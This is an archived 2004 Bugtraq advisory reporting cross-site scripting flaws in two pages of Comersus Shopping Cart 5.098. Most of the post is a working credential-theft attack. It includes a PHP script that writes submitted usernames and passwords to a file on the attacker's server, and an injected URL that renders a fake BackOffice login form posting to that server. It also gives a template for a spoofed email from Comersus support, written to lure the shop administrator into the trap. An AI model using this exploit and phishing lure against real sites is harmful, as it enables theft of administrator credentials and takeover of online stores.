Home page logo
/

bugtraq logo Bugtraq mailing list archives

Comersus 5.098 XSS Vulnerable
From: Abdul Azis <az001 () plasa com>
Date: 2 Aug 2004 11:48:40 -0000



Comersus Shopping Cart 5.098 XSS Vulnerability 
=======================================================
Vulnerable Systems:

* Comersus Cart Version 5.098

Comersus is an open source shopping cart.I found a few XSS Vulnerabilty :


Pages Affected:
/comersus/store/comersus_message.asp
/comersus/backofficeLite/comersus_backoffice_message.asp



Examples:

http://www.target.net/comersus/store/comersus_message.asp?message=<h4>VULNERABLE</h4>
http://www.target.net/comersus/backofficelite/comersus_backoffice_message.asp?message=<h4>VULNERABLE</h4>


Try this :

1 Step : 

Create a file called comersus.php 

<?
$buka = fopen("comersus.txt","a+");
fwrite($buka,"User:".$uid."|"."Password:".$passwd."|");
fclose($buka);
header("Location:http://www.target.net/comersus/backofficelite/comersus_backoffice_message.asp?message=Your+authentication+data+is+incorrect...";);
exit();
?>

Next Step :

Open url :

http://www.target.net/comersus/backofficelite/comersus_backoffice_message.asp?message=<form%20action=http://mysite.org/comersus.php%20method=post><h3>BackOffice%20Lite</h3><p>User<br><input%20type=text%20name=uid><br>Password<br><input%20type=password%20name=passwd><p><input%20type=submit%20value=%20Login%20></form>


Enter user and password,then Submit

After that, enter this url:

http://mysite.org/comersus.txt


This is a result(comersus.txt) :

User:az001|Password:passwordnya|



Sent a fake email from Comersus Site(support () comersus com) to www.target.net admin (ex. admin () target net):


Hello admin () target net blablablablabla ...............................................

................................................................

Please Login with username and password <a 
href="http://www.target.net/comersus/backofficelite/comersus_backoffice_message.asp?message=<form%20action=http://mysite.org/comersus.php%20method=post><h3>BackOffice%20Lite</h3><p>User<br><input%20type=text%20name=uid><br>Password<br><input%20type=password%20name=passwd><p><input%20type=submit%20value=%20Login%20></form>">here</a>



and Wait until admin execute url 






  By Date           By Thread  

Current thread:
  • Comersus 5.098 XSS Vulnerable Abdul Azis (Aug 02)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]